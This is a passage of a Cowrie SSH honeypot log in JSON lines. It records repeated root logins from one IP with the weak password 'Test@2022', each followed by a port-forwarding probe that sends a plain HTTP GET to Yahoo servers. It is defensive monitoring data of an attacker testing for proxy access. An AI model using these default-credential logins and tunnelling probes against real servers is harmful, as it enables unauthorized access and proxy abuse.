ha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:51.863049Z","src_ip":"213.209.150.239","session":"dfede42c9cb1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:52.145288Z","src_ip":"213.209.150.239","session":"dfede42c9cb1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":29554,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29554","sensor":"my-vps","timestamp":"2025-08-26T00:54:52.202804Z","session":"dfede42c9cb1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:52.261343Z","src_ip":"213.209.150.239","session":"dfede42c9cb1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":13921,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:13921","sensor":"my-vps","timestamp":"2025-08-26T00:54:52.415085Z","session":"dfede42c9cb1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:52.471772Z","src_ip":"213.209.150.239","session":"dfede42c9cb1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:52.529263Z","src_ip":"213.209.150.239","session":"dfede42c9cb1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49982,"dst_ip":"1.2.3.4","dst_port":22,"session":"98819d05cbb2","protocol":"ssh","message":"New connection: 213.209.150.239:49982 (1.2.3.4:22) [session: 98819d05cbb2]","sensor":"my-vps","timestamp":"2025-08-26T00:54:52.584956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:52.586196Z","src_ip":"213.209.150.239","session":"98819d05cbb2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:52.643044Z","src_ip":"213.209.150.239","session":"98819d05cbb2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:52.925600Z","src_ip":"213.209.150.239","session":"98819d05cbb2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":3200,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:3200","sensor":"my-vps","timestamp":"2025-08-26T00:54:52.983169Z","session":"98819d05cbb2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:53.039803Z","src_ip":"213.209.150.239","session":"98819d05cbb2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":16785,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:16785","sensor":"my-vps","timestamp":"2025-08-26T00:54:53.195002Z","session":"98819d05cbb2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:53.251909Z","src_ip":"213.209.150.239","session":"98819d05cbb2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:53.309369Z","src_ip":"213.209.150.239","session":"98819d05cbb2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50021,"dst_ip":"1.2.3.4","dst_port":22,"session":"50e2697cd883","protocol":"ssh","message":"New connection: 213.209.150.239:50021 (1.2.3.4:22) [session: 50e2697cd883]","sensor":"my-vps","timestamp":"2025-08-26T00:54:53.365120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:53.365752Z","src_ip":"213.209.150.239","session":"50e2697cd883"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:53.423148Z","src_ip":"213.209.150.239","session":"50e2697cd883"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:53.705504Z","src_ip":"213.209.150.239","session":"50e2697cd883"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":13731,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:13731","sensor":"my-vps","timestamp":"2025-08-26T00:54:53.763103Z","session":"50e2697cd883"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:53.820069Z","src_ip":"213.209.150.239","session":"50e2697cd883"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":20754,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:20754","sensor":"my-vps","timestamp":"2025-08-26T00:54:53.975119Z","session":"50e2697cd883"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.031757Z","src_ip":"213.209.150.239","session":"50e2697cd883"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.088969Z","src_ip":"213.209.150.239","session":"50e2697cd883"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50064,"dst_ip":"1.2.3.4","dst_port":22,"session":"2118f2a19223","protocol":"ssh","message":"New connection: 213.209.150.239:50064 (1.2.3.4:22) [session: 2118f2a19223]","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.144542Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.145599Z","src_ip":"213.209.150.239","session":"2118f2a19223"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.202132Z","src_ip":"213.209.150.239","session":"2118f2a19223"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.484210Z","src_ip":"213.209.150.239","session":"2118f2a19223"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":9607,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:9607","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.541758Z","session":"2118f2a19223"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.598950Z","src_ip":"213.209.150.239","session":"2118f2a19223"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":3072,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:3072","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.755066Z","session":"2118f2a19223"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.811709Z","src_ip":"213.209.150.239","session":"2118f2a19223"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.868995Z","src_ip":"213.209.150.239","session":"2118f2a19223"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50101,"dst_ip":"1.2.3.4","dst_port":22,"session":"32c167393823","protocol":"ssh","message":"New connection: 213.209.150.239:50101 (1.2.3.4:22) [session: 32c167393823]","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.915367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.916046Z","src_ip":"213.209.150.239","session":"32c167393823"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:54.963434Z","src_ip":"213.209.150.239","session":"32c167393823"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:55.198451Z","src_ip":"213.209.150.239","session":"32c167393823"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":20529,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20529","sensor":"my-vps","timestamp":"2025-08-26T00:54:55.247552Z","session":"32c167393823"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:55.294825Z","src_ip":"213.209.150.239","session":"32c167393823"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":15282,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:15282","sensor":"my-vps","timestamp":"2025-08-26T00:54:55.429582Z","session":"32c167393823"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:55.476898Z","src_ip":"213.209.150.239","session":"32c167393823"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:55.525064Z","src_ip":"213.209.150.239","session":"32c167393823"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50136,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ad7953e29f9","protocol":"ssh","message":"New connection: 213.209.150.239:50136 (1.2.3.4:22) [session: 1ad7953e29f9]","sensor":"my-vps","timestamp":"2025-08-26T00:54:55.581016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:55.581686Z","src_ip":"213.209.150.239","session":"1ad7953e29f9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:55.638630Z","src_ip":"213.209.150.239","session":"1ad7953e29f9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:55.921175Z","src_ip":"213.209.150.239","session":"1ad7953e29f9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":10200,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:10200","sensor":"my-vps","timestamp":"2025-08-26T00:54:55.978843Z","session":"1ad7953e29f9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.035952Z","src_ip":"213.209.150.239","session":"1ad7953e29f9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":13106,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:13106","sensor":"my-vps","timestamp":"2025-08-26T00:54:56.191081Z","session":"1ad7953e29f9"}
